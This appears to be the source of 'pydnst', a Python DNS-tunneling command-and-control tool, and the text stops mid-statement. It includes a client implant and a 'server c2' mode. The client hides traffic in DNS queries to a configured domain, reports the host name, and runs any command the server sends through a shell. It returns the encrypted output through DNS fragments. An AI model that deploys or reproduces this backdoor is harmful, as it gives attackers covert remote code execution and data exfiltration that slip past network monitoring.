import sys
import os
import gzip
import time
import logging
from logging.handlers import RotatingFileHandler

PYTHON_VERSION = (sys.version_info.major,sys.version_info.minor)
if PYTHON_VERSION < (3,6):
    print('dnst_server minimum requirement : Python 3.6')
    sys.exit(1)
PYTHON_GREATER_37 = (PYTHON_VERSION >= (3,7))    


DEFAULT_LOGGER_NAME = 'pydnst'
LOGFILE_DEFAULT_PATH = 'pydnst.log'
LOG_LEVEL = 'INFO'
LOG_ROTATE = True
LOG_FORMAT = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
LOG_FORMAT_SHORT = '%(asctime)s - %(levelname)s - %(message)s'
LOG_BK_COUNT = 5
LOG_MAX_SIZE = 67108864 # 2**26 = 64 MB

def get_logger(logfile_path=LOGFILE_DEFAULT_PATH, first_run=False, silent=True, logger_name=DEFAULT_LOGGER_NAME, 
               log_format=LOG_FORMAT, level=LOG_LEVEL, rotate=LOG_ROTATE):
    
    def namer(name):
        return name + '.gz'
    
    def rotator(source, dest):
        with open(source, 'rb') as sf:
            data = sf.read()
        compressed = gzip.compress(data)
        with open(dest, 'wb') as df:
            df.write(compressed)
        os.truncate(source, 0)
    
    logger = logging.getLogger(logger_name)
    logger.handlers = []
    if not first_run:
        handlers = []
        if logfile_path:    #could be '' if no config file provided
            if rotate:
                if rotate is True:
                    rotate = LOG_MAX_SIZE
                else:
                    #use user defined value                    
                    try:
                        rotate = int(rotate)
                    except Exception:
                        rotate = LOG_MAX_SIZE
                fh = RotatingFileHandler(logfile_path, maxBytes=rotate, backupCount=LOG_BK_COUNT)
                fh.rotator = rotator
                fh.namer = namer                
                handlers.append(fh)
            else:
                handlers.append(logging.FileHandler(logfile_path))
        if not silent:
            handlers.append(logging.StreamHandler(sys.stdout))
        if not handlers:
            logger.addHandler(logging.NullHandler())
            return logger

        log_level = getattr(logging, level, logging.INFO)
        logger.setLevel(log_level)        
        
        formatter = logging.Formatter(log_format)
        formatter.converter = time.gmtime
        for fh in handlers:
            fh.setFormatter(formatter)
            fh.setLevel(logging.DEBUG)        
            logger.addHandler(fh)
    else:
        logger.addHandler(logging.NullHandler())    
    
    return logger




import subprocess
from scapy.all import DNS, DNSQR, raw
import random
import os
import weakref
import socket
import time
import sys
import hashlib
import toml
from cryptography.fernet import Fernet as crypto_Fernet
from cryptography.hazmat.backends import default_backend as crypto_default_backend
from cryptography.hazmat.primitives.asymmetric import padding as crypto_padding
from cryptography.hazmat.primitives import serialization as crypto_serialization, hashes as crypto_hashes
from cryptography.exceptions import InvalidSignature as crypto_InvalidSignature

from .helpers import get_logger
from .message import MessageBuilder

logger = None
PATH_CONFIG = 'pydnst.toml'

EXPECT_ACK_TO_FRAGMENTS = True
SERVER_SENDS_RSA_KEY_HASH_CONFIRMATION = False
SERVER_SENDS_RSA_KEY_HASH_CONFIRMATION = SERVER_SENDS_RSA_KEY_HASH_CONFIRMATION and EXPECT_ACK_TO_FRAGMENTS

SERVER_CLIENT_ID = '0'
KA_COMMAND_ID = '0'
RSA_COMMAND_ID = '1'
ACK_COMMAND_ID = '2'
COMMANDS_WITHOUT_ENCRYPTION = (KA_COMMAND_ID, RSA_COMMAND_ID, ACK_COMMAND_ID)
COMMANDS_WITHOUT_ACK = (KA_COMMAND_ID, ACK_COMMAND_ID)  #with REQUEST_NEXT_FROM_SERVER and REQUEST_RSA_KEY_HASH_FROM_SERVER

CONNECTION_TIMEOUT = 5
COMMAND_TIMEOUT = 60

REQUEST_NEXT_FROM_SERVER = b'nextpls'
REQUEST_RSA_KEY_HASH_FROM_SERVER = b'cfrmpls'

DR_NOT_READY = 'not_ready'
DR_NOT_READY_GOT_ACK = 'not_ready_got_ack'
DR_RSA_HANDSHAKE_COMPLETE = 'rsa_complete'    
DR_KA_ACK = 'ka_ack'
SOCKET_RESPONSE_TIMEOUT = 2

class DnstClient:

    def __init__(self):
        global logger
        logger = get_logger(logger_name='pydnst_client')
        
        if not os.path.exists(PATH_CONFIG):
            logger.info(f'No config file at {PATH_CONFIG}, leaving ...')
            sys.exit(1)    
        with open(PATH_CONFIG,'r') as fd:
            config_toml = toml.load(fd)
        self.DNST_SERVER_NAME = config_toml['general']['DNST_SERVER_NAME'].encode()
        self.DEFAULT_SHARED_KEY = config_toml['general']['DEFAULT_SHARED_KEY'].encode()
        config_client = config_toml['client']
        self.USE_DEFAULT_DNS_SERVER = config_client['USE_DEFAULT_DNS_SERVER']
        self.MAIN_INTERFACE = config_client['MAIN_INTERFACE']
        self.DNS_SERVER_ADDRESS_FALLBACK = config_client['DNS_SERVER_ADDRESS_FALLBACK']
        self.DNS_SERVER_ADDRESS = config_client['DNS_SERVER_ADDRESS']
        self.DNS_SERVER_PORT = config_client['DNS_SERVER_PORT']
        self.KEEP_ALIVE_PERIOD = config_client['KEEP_ALIVE_PERIOD']
        self.DNST_CLIENT_ID_PATH = config_client['DNST_CLIENT_ID_PATH']
        self.SERVER_PUBLIC_PEM_PATH = config_client['SERVER_PUBLIC_PEM_PATH']             
        
        if self.USE_DEFAULT_DNS_SERVER:
            try:
                self.DNS_SERVER_ADDRESS = subprocess.check_output(f"nmcli device show {self.MAIN_INTERFACE} |grep IP4.DNS | awk -F ' ' '{{ print $2 }}'", shell=True).strip().decode()
            except Exception:
                logger.warning(f'Cannot obtain {self.MAIN_INTERFACE} to find DNS address')
                self.DNS_SERVER_ADDRESS = self.DNS_SERVER_ADDRESS_FALLBACK
#        else:
#            self.DNS_SERVER_ADDRESS = DNS_SERVER_ADDRESS            
        
        try:
            if os.path.exists(self.DNST_CLIENT_ID_PATH):
                with open(self.DNST_CLIENT_ID_PATH, 'r') as fd:
                    self.client_id = min(int(fd.read().strip()), 255)
            else:
                self.client_id = str(random.randint(1,255))
                with open(self.DNST_CLIENT_ID_PATH, 'w') as fd:
                    fd.write(self.client_id)
                
            self.client_details = b'unknown'
            if os.path.exists('/etc/hostname'):
                with open('/etc/hostname', 'rb') as fd:
                    hostname = fd.read().strip()[:16]
                    if hostname:
                        self.client_details = hostname
            self.client_details = self.client_details[:13]
            self.server_address = (self.DNS_SERVER_ADDRESS, self.DNS_SERVER_PORT)
            self.is_server = False
            self.dnst_id = self.client_id
            self.transport = None
            self.message_builder = MessageBuilder(logger, weakref.proxy(self), self.DNST_SERVER_NAME, self.DEFAULT_SHARED_KEY)
            if self.message_builder.max_fragment_payload_sizes['request']['TXT'] < 1:
                logger.error(f'Cannot work with too long domain name {self.DNST_SERVER_NAME}')
                sys.exit(1)
            self.max_data_length = self.message_builder.max_data_length['request']
            self.received_fragments = {}    #key=client_id, value= {key=command_id, value={'date':'', 'list_of_fragments':[]}
            self.tunnel_messages = {}    #key=client_id, value= {key=command_id, value={'date':'', 'response':''}
                        
            self.server_public_key = None
            if os.path.exists(self.SERVER_PUBLIC_PEM_PATH):
                self.init_rsa_resources()
                
        except Exception:
            logger.exception('DnstClient')

    def init_rsa_resources(self):
        logger.info('Using a server public pem')
        with open(self.SERVER_PUBLIC_PEM_PATH, 'rb') as key_file:
            self.server_public_key = crypto_serialization.load_pem_public_key(
                key_file.read(),
                backend=crypto_default_backend()
            )
        logger.info('Generating shared key')
        self.shared_key = crypto_Fernet.generate_key()
        self.shared_key_encrypted = self.server_public_key.encrypt(
                self.shared_key,
                crypto_padding.OAEP(
                    mgf=crypto_padding.MGF1(algorithm=crypto_hashes.SHA256()),
                    algorithm=crypto_hashes.SHA256(),
                    label=None
                ))
        hasher = hashlib.sha256()
        hasher.update(self.shared_key)
        self.shared_key_hash = hasher.digest()
        self.tunnel_mng_messages = {RSA_COMMAND_ID:{}, ACK_COMMAND_ID:{}}
        self.rsa_handshake_complete = False        

    def datagram_received(self, data, addr):
        #returns True for valid response sent by server : command or ka
        #returns False otherwise
        try:
            dns_data = DNS(data)
            logger.info(f'datagram_received from {addr} : {data}')
            if not dns_data.an:
                logger.info('Received irrelevant message from server, our DNS server might not be answering')
                return False
            data_scapy = dns_data.an.rdata[0]
            logger.debug(f'Parsed datagram received : {DNS(data).show(dump=True)}')
            if dns_data.id != self.last_transaction_id_sent:
                logger.info('Received invalid transaction id answer from server, ignoring')
                return False
                
            res = self.message_builder.reassemble_fragment(data_scapy)
            if res is False:
                logger.info('Received invalid answer from server, our DNS server might not be answering')
                return False
            else:                
                client_id, command_id, fragment_id, number_of_fragments, is_ready = res
                
                if is_ready is not True:
                    logger.info(f'Asking for next fragment from server, by acking that fragment {fragment_id} out of {number_of_fragments} was successfully received')
                    try:
                        self.send_data(REQUEST_NEXT_FROM_SERVER + b'-'+ str(fragment_id).encode() + b'-'+str(random.randint(0,99)).encode(), command_id,
                                       rtype='TXT')
                    except Exception:
                        logger.exception('process_received_rsa InvalidSignature')
                    if command_id == ACK_COMMAND_ID:
                        return DR_NOT_READY_GOT_ACK
                    return DR_NOT_READY
                
                if command_id == ACK_COMMAND_ID:
                    try:
                        ack_fragment_index = int(self.tunnel_mng_messages[command_id].pop(client_id, b'').split(b'-')[0])
                        logger.info(f'Received ack response to fragment {ack_fragment_index} from server')
                        return ack_fragment_index  #True                        
                    except Exception:
                        logger.exception('ack_fragment_index')
                        return True                        
                    
                elif command_id == KA_COMMAND_ID:
                    logger.info('Received keep-alive response from server')
                    return DR_KA_ACK
                
                elif command_id == RSA_COMMAND_ID:
                    logger.info('Received rsa response from server')
                    res = self.process_received_rsa(self.tunnel_mng_messages[command_id].pop(client_id, b''))
                    #if res:
                    return res
                else:
                    received_message = self.tunnel_messages[client_id][command_id]                    
                    logger.info(f'Received command id {command_id} from server : {received_message}')                
                    self.process_received_command(received_message['response'], command_id)
            return True
        except Exception:
            logger.exception('datagram_received')
            return False
    
    def process_received_rsa(self, received_message):
        logger.info('Verifying that server returned correct shared_key_hash')
        try:
            self.server_public_key.verify(
                received_message,
                self.shared_key_hash,
                crypto_padding.PSS(
                    mgf=crypto_padding.MGF1(crypto_hashes.SHA256()),
                    salt_length=crypto_padding.PSS.MAX_LENGTH
                ),
                crypto_hashes.SHA256()
            )
            self.rsa_handshake_complete = True
            logger.info('Server returned valid shared_key_hash, rsa handshake is complete')
            self.message_builder.use_shared_key_for_client(SERVER_CLIENT_ID, self.shared_key)
            return DR_RSA_HANDSHAKE_COMPLETE
        except crypto_InvalidSignature:
            logger.info('Server returned invalid shared_key_hash, sending it again')
            try:
                self.rsa_handshake_complete = False
                self.send_data(self.shared_key_encrypted, RSA_COMMAND_ID, rtype='TXT')
                if not SERVER_SENDS_RSA_KEY_HASH_CONFIRMATION:
                    #no wait for server hash confirmation, send ka now
                    self.rsa_handshake_complete = True
                    return True
                #client will receive the server hash confirmation in the next loops of "while res == DR_NOT_READY" in loop_keep_alives
                return DR_NOT_READY
            except Exception:
                logger.exception('process_received_rsa InvalidSignature')
        except Exception:
            logger.exception('process_received_rsa')
    
    def process_received_command(self, received_message, command_id):
        logger.info(f'Processing command id {command_id} : {received_message}')
        try:
            proc = subprocess.run(received_message, shell=True, timeout=COMMAND_TIMEOUT,
                                      stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
            if proc.returncode != 0:
                logger.error(f'Error while executing command {command_id} : {proc.stdout}')
            stdout = proc.stdout.strip()
            logger.info(f'Sending response id {command_id} : {stdout}')
            self.send_data(stdout, command_id)  
        except Exception:
            logger.exception('process_received_command')


    def send_data(self, data, command_id, rtype='TXT', without_encryption=False):
        logger.info(f'Sending data of length {len(data)}')
        if command_id in COMMANDS_WITHOUT_ENCRYPTION:
            without_encryption = True        
        if len(data) > self.max_data_length:
            logger.info(f'Truncating data of length {len(data)} to {self.max_data_length}')
            data = data[:self.max_data_length]
        fragments = self.message_builder.fragmenter(data, rtype, SERVER_CLIENT_ID, command_id, is_dns_response=False,
                                                    without_encryption=without_encryption)

        expect_ack = False
        if EXPECT_ACK_TO_FRAGMENTS:
            expect_ack = True
            if command_id in COMMANDS_WITHOUT_ACK:
                expect_ack = False
            elif data.startswith(REQUEST_NEXT_FROM_SERVER):
                expect_ack = False
            elif data.startswith(REQUEST_RSA_KEY_HASH_FROM_SERVER):
                expect_ack = False
                
        self.send_fragments(fragments, rtype, command_id, expect_ack)


    def send_fragments(self, fragments, rtype, command_id, expect_ack):
        #This fragment expects a ACK in case EXPECT_ACK_TO_FRAGMENTS and command_id not in COMMANDS_WITHOUT_ACK
        #in that case, for each fragment we open and then close a socket
        #otherwise, we just open a socket to send the fragment, without closing it (since a response will be expected)
        
        number_of_fragments = len(fragments)
        index = 1
            
        if expect_ack:
            while index <= number_of_fragments:
                fragment = fragments[index-1]
                logger.info(f'Sending fragment {index} out of {number_of_fragments}')
                res = self.sock_connect()                        
                if res is False:
                    time.sleep(SOCKET_RESPONSE_TIMEOUT)
                    continue
                
                self.send_message(fragment, rtype)
                
                #this prevents ICMP messages when not listening to the response
                try:
                    logger.info('Waiting for ack')
                    self.sock.settimeout(SOCKET_RESPONSE_TIMEOUT)                    
                    received_data, remote_address = self.sock.recvfrom(4096)
                    self.sock.settimeout(None)
                except socket.timeout:
                    logger.info(f'Timeout, resending fragment index {index}')
                    self.sock.close()
                    continue
                logger.info(f'Maybe received ack to fragment {index} out of {number_of_fragments}')
                res = self.datagram_received(received_data, remote_address)
                if res is True or (res == index):
                    index += 1
                else:
                    #if got ack for another fragment, ignore it and send again                        
                    logger.info(f'Ignoring ack index {res} after sending fragment index {index}')
                self.sock.close()
        else:
            res = self.sock_connect()            
            if res is False:
                return
            for fragment in fragments:
                logger.info(f'Sending fragment {index} out of {number_of_fragments}')
                self.send_message(fragment, rtype)
                index += 1


    def send_message(self, dns_data, rtype):
        transaction_id = random.randint(0,65536)
        data_scapy = DNS(id=transaction_id, rd=1, qd=DNSQR(qname=dns_data, qtype=rtype))
        message = raw(data_scapy)
        logger.info(f'Sending message {message}, with id {transaction_id}, with data {dns_data}, and type {rtype}')
        logger.debug(f'Using query qd {data_scapy.show(dump=True)}')
        self.last_transaction_id_sent = transaction_id
        self.sock.sendto(message, self.server_address)

    def sock_connect(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.settimeout(CONNECTION_TIMEOUT)
        
        try:
            logger.info('Trying new connection to DNS server')
            self.sock.connect(self.server_address)
        except socket.timeout:
            logger.warning(f'Could not connect to DNS server') #, sleeping {CONNECTION_TIMEOUT}s')
            self.sock.close()
            #time.sleep(CONNECTION_TIMEOUT)
            return False
        return True
                
    def send_keep_alive(self):    
        logger.info('Sending keep-alive')
        #we enforce keep-alive to occupy only 1 fragment, by limiting the client_details size
        #keep-alive is defined by : command_id = 0
        keep_alive_content = self.client_details + b'-'+str(random.randint(0,99)).encode()
        keep_alive_content = keep_alive_content[:16]   #must be smaller than 16 to occupy only 1 fragment
        self.send_data(keep_alive_content, KA_COMMAND_ID, rtype='TXT')
    
    def loop_keep_alives(self):
        logger.info('Starting loop_keep_alives')                      
        while True:                                 
            try:              
                if self.server_public_key:
                    if not self.rsa_handshake_complete:                        
                        logger.info('Sending shared_key_encrypted')
                        self.send_data(self.shared_key_encrypted, RSA_COMMAND_ID, rtype='TXT')
                        
                        if SERVER_SENDS_RSA_KEY_HASH_CONFIRMATION:

                            logger.info('Sending request for shared_key_encrypted ack from server')
                            #use ACK_COMMAND_ID to not close the socket and not expect ack from server (also to not encode this message and to send it in 1 fragment)
                            self.send_data(REQUEST_RSA_KEY_HASH_FROM_SERVER + b'-'+str(random.randint(0,99)).encode(), RSA_COMMAND_ID,
                                   rtype='TXT')                                    
                            logger.info('Waiting for rsa shared key confirmation or bad response or timeout')
                            
                            res = DR_NOT_READY
                            while res == DR_NOT_READY:
                                try:
                                    self.sock.settimeout(SOCKET_RESPONSE_TIMEOUT)                    
                                    received_data, remote_address = self.sock.recvfrom(4096)
                                    self.sock.settimeout(None)
                                except socket.timeout:
                                    self.sock.close()
                                    time.sleep(SOCKET_RESPONSE_TIMEOUT)
                                    continue
                                logger.info('Received new rsa message from DNS server')
                                res = self.datagram_received(received_data, remote_address)
                                if res == DR_NOT_READY:
                                    continue
                                elif res is False or (res == DR_NOT_READY_GOT_ACK) or (res == 1):
                                    #something's weird, we receive ack instead of hash key confirmation, request again
                                    #res=1 in case we received an ack single fragment
                                    logger.info('Sending AGAIN request for shared_key_encrypted ack from server')
                                    #use ACK_COMMAND_ID to not close the socket and not expect ack from server (also to not encode this message and to send it in 1 fragment)
                                    self.sock.close()
                                    self.send_data(REQUEST_RSA_KEY_HASH_FROM_SERVER + b'-'+str(random.randint(0,99)).encode(), RSA_COMMAND_ID,
                                                   rtype='TXT')
                                    res = DR_NOT_READY
                                    continue
                                    
                                elif res == DR_RSA_HANDSHAKE_COMPLETE:
                                    self.sock.close()
                                    break    #we want to send ka asap now
                                #if res is False:
                                else:
                                    res = DR_NOT_READY    #ignore bad stuff coming from dns server
                        else:
                            time.sleep(2)
                            logger.info('Assuming rsa handshake is complete (configured without server confirmation)')
                            self.rsa_handshake_complete = True
                            self.message_builder.use_shared_key_for_client(SERVER_CLIENT_ID, self.shared_key)

                self.send_keep_alive()
                    
                res = DR_NOT_READY
                send_ka_now = False
                while res == DR_NOT_READY:
                    try:
                        logger.info('Waiting for ka response or bad response or timeout')
                        self.sock.settimeout(SOCKET_RESPONSE_TIMEOUT)                    
                        received_data, remote_address = self.sock.recvfrom(4096)
                        self.sock.settimeout(None)
                    except socket.timeout:
                        self.sock.close()
                        break
                    logger.info('Received new message from DNS server')
                    self.sock.close()
                    res = self.datagram_received(received_data, remote_address)
                    if res == True:
                        send_ka_now = True
                        break
                    elif res == DR_KA_ACK:
                        break
                    if res is False:
                        res = DR_NOT_READY    #ignore bad stuff coming from dns server

                if send_ka_now:
                    continue
                time.sleep(self.KEEP_ALIVE_PERIOD)                
            except Exception:
                logger.exception('loop_keep_alives')
            
    def run(self):
        try:
            logger.info(f'DnstClient started with DNS server {self.DNS_SERVER_ADDRESS}, client_id {self.client_id}, and client_details {self.client_details}')
            self.loop_keep_alives()

        except Exception:
            logger.exception('run')
        except:
            logger.info('DnstClient stopped')
    




from cryptography.fernet import Fernet
from zlib import crc32
import  base64
import struct
import time
from datetime import datetime


HEADER_STRUCT = struct.Struct('BBBB')
HEADER_LENGTH = HEADER_STRUCT.size
HEADER_LENGTH_ENCODED = 16 #(base32 of header (4 bytes) and crc32 (4 bytes))
#A query field max size is 250 (experimental) - 4 (max label lengths) - 16 (header) - (len(dns_server_name)+1) = 230 - 12 = 218
#A query field label max size is 35 : 63 - 16 (header) - (len(dns_server_name)+1) = 35

FRAGMENTS_EXPIRATION_TIME = 30*60
MAX_COMMAND_LENGTH = 1000
KA_COMMAND_ID = '0'
RSA_COMMAND_ID = '1'
ACK_COMMAND_ID = '2'
COMMANDS_WITHOUT_ENCRYPTION = (KA_COMMAND_ID, RSA_COMMAND_ID, ACK_COMMAND_ID)


class MessageBuilder:
    def __init__(self, logger, dnst, dns_server_name, DEFAULT_SHARED_KEY):
        self.logger = logger.getChild('MessageBuilder')
        self.dnst, self.dns_server_name = dnst, dns_server_name
        self.max_fragment_payload_sizes = {'request': {'A': 63-16-len(dns_server_name)-1, 'TXT':63-16-len(dns_server_name)-1, 
                                      'NULL': 63-16-len(dns_server_name)-1},
                          'response': {'TXT':234-16-len(dns_server_name)-1}}
    
        #experimentally, the base32+encryption bloat the data by a factor of slightly less than 2.2    
        self.max_data_length = {'request': int(254*(63-16-len(dns_server_name)-1) // 2.2),
                                'response': int(254*(234-16-len(dns_server_name)-1) // 2.2)}        
        self.encryptors = {}
        self.default_encryptor = Fernet(DEFAULT_SHARED_KEY)
    
    
    def use_shared_key_for_client(self, client_id, shared_key):
        self.encryptors[client_id] = Fernet(shared_key)
        
    def b32encode(self, data):
        #avoid '=' not allowed in A record, use instead '8' which is absent from base32
        res = base64.b32encode(data)
        res = res.replace(b'=', b'8')
        return res

    def b32decode(self, data):
        #avoid '=' not allowed in A record, use instead '8' which is absent from base32
        data = data.replace(b'8', b'=')        
        res = base64.b32decode(data)
        return res
        
    def encode_payload(self, data, client_id, without_encryption=False):
        if without_encryption:
            encrypted_data = data
        else:
            #encrypt the data
            encryptor = self.encryptors.get(client_id, self.default_encryptor)
            encrypted_data = encryptor.encrypt(data)
        #prepend crc32 (4 bytes) for data integrity
        crc = crc32(encrypted_data).to_bytes(4, byteorder='big')
        #base32 encode
        payload = self.b32encode(crc + encrypted_data)
        #return b'\x55'*len(payload)
        return payload
    
    def decode_payload(self, payload, client_id, without_encryption=False):
        #base32 decode
        payload_b32decoded = self.b32decode(payload)
        #check crc
        crc = int.from_bytes(payload_b32decoded[:4], byteorder='big')
        crc_calc = crc32(payload_b32decoded[4:])
        if crc != crc_calc:
            self.logger.warning('Received packet payload with wrong crc, discarding it')
            return False
        
        if without_encryption:
            #circumvent the encryption for keep-alive
            data = payload_b32decoded[4:]
        else:
            #decrypt the data
            encryptor = self.encryptors.get(client_id, self.default_encryptor)
            data = encryptor.decrypt(payload_b32decoded[4:])
        return data    
    
    def fragment_payload(self, payload, rtype, is_dns_response):
        #fragments the payload into a list of fragments, each of which should fit in a separate dns packet
        fragments = []
        read_index = 0
        fragment_length = self.max_fragment_payload_sizes['response' if is_dns_response else 'request'][rtype]
        number_of_fragments_except_last, last_fragment_length = divmod(len(payload), fragment_length)
        for el in range(number_of_fragments_except_last):
            fragments.append(payload[read_index : read_index + fragment_length])
            read_index += fragment_length
        if last_fragment_length:
            fragments.append(payload[-last_fragment_length:])
                
        #removed because the first labels are not forwarded by dns server to authoritative server (only last labels are)
        #so we cannot leverage that by adding more labels of 63 length
        if False: #not self.dnst.is_server:
            #client sends qname with dots
            #add the length byte before each label as expected by RFC-1035
            #it will add up to 3 bytes to each fragment, which will make the fragment reach up to 243 bytes, which is still under the limit
            LABEL_MAX_LENGTH = 63
            new_fragments = []
            for fragment in fragments:
                new_fragment = bytearray()
                read_index = 0
                number_of_labels_except_last, last_label_length = divmod(len(fragment), LABEL_MAX_LENGTH)
                for el in range(number_of_labels_except_last):
                    new_fragment += (b'.' + fragment[read_index : (read_index + LABEL_MAX_LENGTH)])
                if last_label_length:
                    new_fragment += (b'.' + fragment[-last_label_length:])
                new_fragments.append(new_fragment)
            fragments = new_fragments
            
        if not (self.dnst.is_server and (rtype != 'A')):
            #append the dns server name at the end of each fragment
            #-always for client (since it sends it query inside the qd.qname field which uses dots)
            #-for server : based on an.type : if the response is of TXT type, dots were not added, so don't remove them at reception
            for index in range(len(fragments)):
                fragments[index] += (b'.'+self.dns_server_name)
        return fragments
        
    def build_packet_header(self, command_id, fragment_id, number_of_fragments):
        #packet header is 4 bytes, with 4 crc32 bytes, all base32 encoded : overall header length is 16 bytes
        #client_id (1 byte) - command_id (1 byte) - fragment_id (1 byte) (starts 1) - number of fragments (1 byte)
        #command_id = 0 for keep-alive
        header = HEADER_STRUCT.pack(int(self.dnst.dnst_id), int(command_id), fragment_id, number_of_fragments) #4 bytes
        crc = crc32(header).to_bytes(4, byteorder='big')
        header_packet = self.b32encode(crc + header)
        return header_packet
    
    def fragmenter(self, data, rtype, client_id, command_id, is_dns_response=False, without_encryption=False):
        self.logger.info(f'Generating fragments for command_id {command_id}')
        fragments = self.fragment_payload(self.encode_payload(data, client_id, without_encryption=without_encryption), rtype, is_dns_response)
        #truncate the number of fragments if over 255, since our header has only 1 byte for this field
        number_of_fragments = min(len(fragments), 255)
        index = 1
        #the fragments numerotation starts from 1 (not 0), easier to compare with number_of_fragments
        result = []
        for fragment in fragments:
            dns_value = self.build_packet_header(command_id, index, number_of_fragments) + fragment
            result.append(dns_value)
            index += 1
        self.logger.info(f'{number_of_fragments} fragments were generated for command_id {command_id}')            
        return result
            
    def reassemble_fragment(self, fragment):
        self.logger.info('Starting reassemble_fragment')
        try:
            if self.dnst.is_server:
                #server receives from client qname with dots, we exclude the site name
                fragment = fragment.split(b'.')[0] #b''.join(fragment.split(b'.')[:-2])
            header_packet = self.b32decode(fragment[:HEADER_LENGTH_ENCODED])
            crc = header_packet[:4]
            header = header_packet[4:]
            crc_calc = crc32(header).to_bytes(4, byteorder='big')
            if crc != crc_calc:
                self.logger.warning('Received packet header with wrong crc, discarding it')
                return False
            client_id, command_id, fragment_id, number_of_fragments = HEADER_STRUCT.unpack(header)
            client_id = str(client_id)
            command_id = str(command_id)
            self.logger.info(f'Reassembling fragment {fragment_id} out of {number_of_fragments} for client {client_id} and command {command_id}')
            if client_id not in self.dnst.received_fragments:
                self.dnst.received_fragments[client_id] = {}
            received_fragments = self.dnst.received_fragments[client_id]
            new_command_id_entry = False
            if command_id not in received_fragments:
                new_command_id_entry = True
            else:
                if (time.time() - received_fragments[command_id]['date']) > FRAGMENTS_EXPIRATION_TIME:
                    #we don't accept fragments from expired command_id (30 minutes) : we therefore relate to this random command_id as a new one
                    self.logger.info(f'Replacing expired fragments for command_id : {command_id}')
                    received_fragments.pop(command_id, None)
                    new_command_id_entry = True
            if new_command_id_entry:
                #prepare list of fragments for this command_id
                received_fragments[command_id] = {'date':time.time(), 'list_of_fragments': [False]*number_of_fragments}
            received_fragments[command_id]['list_of_fragments'][fragment_id-1] = fragment[HEADER_LENGTH_ENCODED:]
                
            if all(received_fragments[command_id]['list_of_fragments']):
                self.logger.info(f'Fragments received from client_id : {client_id} with command_id : {command_id} are reassembled')
                data = self.decode_payload(b''.join(received_fragments[command_id]['list_of_fragments']), client_id,
                                           without_encryption=(command_id in COMMANDS_WITHOUT_ENCRYPTION))
                if data:
                    self.logger.info(f'Reassembled received valid message from client_id : {client_id} with command_id : {command_id} and content : {data}')
                    if command_id in (RSA_COMMAND_ID, ACK_COMMAND_ID):
                        #store binary data as is in shared_keys to be read when leaving the function by datagram_received
                        self.dnst.tunnel_mng_messages[command_id][client_id] = data
                    else:
                        if client_id not in self.dnst.tunnel_messages:
                            #should happen only for keep-alive
                            self.dnst.tunnel_messages[client_id] = {}
    
                        if command_id not in self.dnst.tunnel_messages[client_id]:
                            if self.dnst.is_server and command_id != KA_COMMAND_ID:
                                self.logger.info(f'Server received response id {command_id} without prior request in tunnel_messages : Ignoring ...')
                                return False
                            else:
                                self.dnst.tunnel_messages[client_id][command_id] = {}                            
                        self.dnst.tunnel_messages[client_id][command_id]['date'] = datetime.fromtimestamp(received_fragments[command_id]['date']).strftime(r'%Y-%m-%d--%H:%M:%S')
                        self.dnst.tunnel_messages[client_id][command_id]['response'] = data.decode().strip()
                        self.logger.info(f'Updated tunnel_messages : {self.dnst.tunnel_messages}')
                        if self.dnst.is_server:
                            #storing it with this new message in json, ordering according to most recent per client                    
                            self.dnst.store_ordered_tunnel_messages(self.dnst.tunnel_messages)
                    #removing the fragments of this command_id since we finished to process them
                    received_fragments.pop(command_id, None)
                    return client_id, command_id, fragment_id, number_of_fragments, True    # reassembled fragment is ready
            return client_id, command_id, fragment_id, number_of_fragments, False    # reassembled fragment is not ready yet
        except Exception:
            self.logger.exception('reassemble_fragment')
            return False
            



import sys
import logging
import pydnst

logger = logging.getLogger('dnst_main')
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
logger.addHandler(handler)

    
HELP = '''
pydnst supported commands :
    -python -m pydnst config : generate pydnst.toml config file, necessary for client and server
    -python -m pydnst create_certificates : create server_private.pem (for server) and server_public.pem (for client)
    -python -m pydnst server run : run the server
    -python -m pydnst client run : run the client
    -python -m pydnst server c2 : send and receives commands to clients
    -python -m pydnst shared_key : generate default shared key shared by client and server (used as a fallback, or when not using certificates)    

'''

def generate_config():
    from cryptography.fernet import Fernet    
    shared_key = Fernet.generate_key()
    config_path = 'pydnst.toml'
    config = f'''
[general]
DNST_SERVER_NAME = "dn1dn1.site"
DEFAULT_SHARED_KEY = "{shared_key.decode()}"

[client]
USE_DEFAULT_DNS_SERVER = false
MAIN_INTERFACE = "wlp1s0"    #if USE_DEFAULT_DNS_SERVER is true
DNS_SERVER_ADDRESS_FALLBACK = "1.1.1.1"   #if USE_DEFAULT_DNS_SERVER is true
DNS_SERVER_ADDRESS = "1.1.1.1"   #if USE_DEFAULT_DNS_SERVER is false
DNS_SERVER_PORT = 53
KEEP_ALIVE_PERIOD = 30
DNST_CLIENT_ID_PATH = "dnst_client_id.txt"
SERVER_PUBLIC_PEM_PATH = "server_public.pem"

[server]
LISTENING_INTERFACE = "eth0"   #"lo"
LISTENING_PORT = 53
SERVER_PRIVATE_PEM_PATH = "server_private.pem"
MESSAGES_JSON = "/var/tmp/pydnst_messages.json"
UDS_PATH_COMMANDER = "/var/tmp/pydnst.uds"    
'''
    with open(config_path,'w') as fd:
        fd.write(config)
    print(f'Config file was generated at {config_path}')

def create_default_shared_key():
    from cryptography.fernet import Fernet
    
    SHARED_KEY = Fernet.generate_key()
    print('Set the following shared_key value in your config file (both client and server)')
    print(SHARED_KEY.decode())

def create_certificates():
    #generate server keys in advance : then provide server_private.pem to server and server_public.pem to client
    
    from cryptography.hazmat.primitives.asymmetric import rsa
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives import serialization
    
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048, backend=default_backend())
    public_key = private_key.public_key()
    
    serial_private = private_key.private_bytes(encoding=serialization.Encoding.PEM,
            format=serialization.PrivateFormat.PKCS8, encryption_algorithm=serialization.NoEncryption())
    with open('server_private.pem', 'wb') as fd:
        fd.write(serial_private)
    print('server_private.pem was generated')
        
    # public key
    serial_pub = public_key.public_bytes(encoding=serialization.Encoding.PEM,
                                         format=serialization.PublicFormat.SubjectPublicKeyInfo)
    with open('server_public.pem', 'wb') as fd:
        fd.write(serial_pub)
    print('server_public.pem was generated')
    

if len(sys.argv) > 2:
    if sys.argv[2] == 'run':
        if sys.argv[1] == 'server':
            server = pydnst.server.DnstServer()
            server.run()
        elif sys.argv[1] == 'client':
            client = pydnst.client.DnstClient()
            client.run()
        else:
